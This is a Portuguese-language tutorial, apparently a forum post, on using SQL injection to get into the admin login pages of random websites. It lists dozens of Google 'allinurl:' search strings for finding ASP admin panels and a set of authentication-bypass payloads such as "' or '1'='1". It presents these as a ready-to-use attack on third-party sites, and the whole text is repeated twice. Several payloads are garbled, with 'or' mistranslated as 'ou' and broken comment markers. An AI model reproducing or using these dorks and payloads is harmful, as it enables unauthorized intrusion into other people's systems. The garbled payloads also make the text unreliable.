SQL Injection é um ataque no qual um código sql é inserido dentro de uma query em um site, permitindo ao atacante obter dados importantes ou acesso a áreas restritas de sites.
Primeiramente ache um site vulneravel para isso use o google,use umas das strings abaixo:
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp
allinurl:/home/adm/index.asp
allinurl:/home/adm/defaul.asp
allinurl:/menu/admin/index.asp
allinurl:/menu/admin/default.asp
allinurl:/menu/admin/login.asp
allinurl:/menu/admin/admin.asp
allinurl:/painel/admin/admin.asp
allinurl:/painel/admin/login.asp
allinurl:/painel/admin/index.asp
allinurl:/painel/admin/default.asp
allinurl:/site/admin/default.asp
allinurl:/site/admin/index.asp
allinurl:/site/admin/login.asp
allinurl:/asp/admin/login.asp
allinurl:/asp/admin/index.as
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/pedidos/admin/index.asp
allinurl:/pedidos/admin/login.asp
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
allinurl:/eshop/admin/
allinurl:/eshop/admin.asp
allinurl:/eshop/admin/default.asp
allinurl:/eshop/admin/index.asp
allinurl:/comercio/admin.asp
allinurl:/comercio/admin/default.asp
allinurl:/comercio/admin/index.asp
allinurl:/news/admin/login.asp
allinurl:/news/admin/default.asp
allinurl:/news/admin/index.asp
allinurl:/imprensa/login.asp
allinurl:/imprensa/admin.asp
allinurl:/imprensa/admin/default.asp
Ira aparecer vários sites,entre em um desses se cair na página de login provavelmente o site está vulneravel.Agora para se logar no campo de login e senha use uma das strings abaixo:
b' or ' 1='
' or '1
' or '|
' or '1'='1
admin ' - -
' ou 0=0 --
" ou 0=0 --
ou 0=0 --
) ou (' x'='x
' ou 1=1 --
" ou 1=1 --
ou 1=1 --
Primeiramente ache um site vulneravel para isso use o google,use umas das strings abaixo:
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp
allinurl:/home/adm/index.asp
allinurl:/home/adm/defaul.asp
allinurl:/menu/admin/index.asp
allinurl:/menu/admin/default.asp
allinurl:/menu/admin/login.asp
allinurl:/menu/admin/admin.asp
allinurl:/painel/admin/admin.asp
allinurl:/painel/admin/login.asp
allinurl:/painel/admin/index.asp
allinurl:/painel/admin/default.asp
allinurl:/site/admin/default.asp
allinurl:/site/admin/index.asp
allinurl:/site/admin/login.asp
allinurl:/asp/admin/login.asp
allinurl:/asp/admin/index.as
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/pedidos/admin/index.asp
allinurl:/pedidos/admin/login.asp
allinurl:/compras/admin/
allinurl:/clientes/admin/
allinurl:/busines/admin/
allinurl:/area_restrita/admin.asp
allinurl:/area_restrita/login.asp
allinurl:/area_restrita/index.asp
allinurl:/acesso/admin.asp
allinurl:/acesso/admin/default.asp
allinurl:/acesso/admin/index.asp
allinurl:/post/admin/default.asp
allinurl:/post/admin/
allinurl:/post/admin/index.asp
allinurl:/post/admin/login.asp
allinurl:/eshop/admin/
allinurl:/eshop/admin.asp
allinurl:/eshop/admin/default.asp
allinurl:/eshop/admin/index.asp
allinurl:/comercio/admin.asp
allinurl:/comercio/admin/default.asp
allinurl:/comercio/admin/index.asp
allinurl:/news/admin/login.asp
allinurl:/news/admin/default.asp
allinurl:/news/admin/index.asp
allinurl:/imprensa/login.asp
allinurl:/imprensa/admin.asp
allinurl:/imprensa/admin/default.asp
Ira aparecer vários sites,entre em um desses se cair na página de login provavelmente o site está vulneravel.Agora para se logar no campo de login e senha use uma das strings abaixo:
b' or ' 1='
' or '1
' or '|
' or '1'='1
admin ' - -
' ou 0=0 --
" ou 0=0 --
ou 0=0 --
) ou (' x'='x
' ou 1=1 --
" ou 1=1 --
ou 1=1 --
Comment